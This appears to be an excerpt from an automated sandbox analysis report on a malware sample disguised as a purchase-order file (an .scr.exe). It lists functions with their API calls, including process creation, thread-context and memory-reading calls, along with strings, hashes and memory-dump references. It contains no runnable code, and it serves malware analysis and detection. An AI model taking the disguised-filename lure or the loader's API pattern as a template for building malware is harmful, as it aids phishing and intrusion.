Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(00000000), ref: 0041013A
SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
_wcscpy.LIBCMT ref: 00410160
SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
_wcscpy.LIBCMT ref: 004101AC
_wcscpy.LIBCMT ref: 00429451

Strings

C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, xrefs: 0041015E, 004101AB, 0042944F, 00429450

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscpy$DesktopFolderFromListMallocPath
String ID: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
API String ID: 192938534-4115471581
Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00401257

Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF

KillTimer.USER32(?,?), ref: 004012B0
SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
String ID:
API String ID: 1792922140-0
Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

Function 0567BAE8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0567BBB9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0567BDDF

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: e84e114128fee1f54196ce78faf2a2c5bbb10b13fc1450dcd81f54f35a3e4433
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: E6A1E774E0020DEBDB14CFA4C898BEEBBB6BF48305F208559E511BB290E7799A41CB54

Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00414F72
_memcpy_s.LIBCMT ref: 00414FE7
__fileno.LIBCMT ref: 00415047
__read.LIBCMT ref: 0041504E
__filbuf.LIBCMT ref: 00415072
_memset.LIBCMT ref: 004150B8
_memset.LIBCMT ref: 004150E3

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_memset.LIBCMT ref: 00401C62
_wcsncpy.LIBCMT ref: 00401CA1
_wcscpy.LIBCMT ref: 00401CBD
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF

Strings

Line: , xrefs: 0042A9F0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
String ID: Line:
API String ID: 1620655955-1585850449
Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
ShowWindow.USER32(?,00000000), ref: 00410454
ShowWindow.USER32(?,00000000), ref: 0041045E

Strings

AutoIt v3, xrefs: 00410409, 0041040E
edit, xrefs: 00410432

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Function 0567B898 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0567B788: Sleep.KERNELBASE(000001F4), ref: 0567B799

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0567B9D7

Strings

AN9QAV3TNFWWSF4BB1KASAGLY4OF, xrefs: 0567BA3A, 0567BA3D

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateFileSleep
String ID: AN9QAV3TNFWWSF4BB1KASAGLY4OF
API String ID: 2694422964-3463479930
Opcode ID: 753264d8a79a6331388cf19f430f58f8ddc439e006883ff13d2287105149f6e9
Instruction ID: 131a32671c62757ec68f2be10bce708d2151e4866a5a499099b41295240dffae
Opcode Fuzzy Hash: 753264d8a79a6331388cf19f430f58f8ddc439e006883ff13d2287105149f6e9
Instruction Fuzzy Hash: 4F616170D0438CDAEF11D7B4C848BEEBBB5AF15704F044199E6497B2C1D6BA0B89CB66

Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00413AA6

Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431

___sbh_find_block.LIBCMT ref: 00413AB1
___sbh_free_block.LIBCMT ref: 00413AC0
RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C

Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC

_strcat.LIBCMT ref: 0040F603

Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8

Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8

Strings

HH, xrefs: 0040F5EE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
String ID: HH
API String ID: 1194219731-2761332787
Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A

Function 0567A788 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0567AF43
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0567AFD9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0567AFFB
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0567B304

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
Instruction ID: 54472eecef81077bf54549b3c61586d9d391196b615951063dc39217af198c4e
Opcode Fuzzy Hash: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
Instruction Fuzzy Hash: 6762FC30A142589BEB24CFA4C854BEEB376FF58300F1091A9D11DEB3A4E7759E81CB59

Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E202
Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A

Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00411734

Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931

std::bad_alloc::bad_alloc.LIBCMT ref: 00411757

Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC

std::bad_exception::bad_exception.LIBCMT ref: 0041176B
__CxxThrowException@8.LIBCMT ref: 00411779

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C

Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96

Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26

Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00435278

Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931

_malloc.LIBCMT ref: 00435288
_malloc.LIBCMT ref: 00435298

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC

Function 00402DD0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

?, xrefs: 0040328E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: ?
API String ID: 3409977793-1684325040
Opcode ID: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
Instruction ID: 9bcf86f15823f24245d2df24eaf2d0b1add52508d906022a273d18f5af470a83
Opcode Fuzzy Hash: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
Instruction Fuzzy Hash: ADE1AB755082028BC710EF21C54566BB7A9AF84708F90493FF485772E2D77CEA8A879F

Function 0567B818 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0567B872

Strings

D, xrefs: 0567B82C

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
Instruction ID: be4cadbb1df9217058bce317dc17debc15739de1740e7c1dc10ea47c9f74dcb6
Opcode Fuzzy Hash: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
Instruction Fuzzy Hash: 9C01FB71A5020CABDB24EFE0CC49FFE7779BF44701F508509BA16AA180FA749648CB65

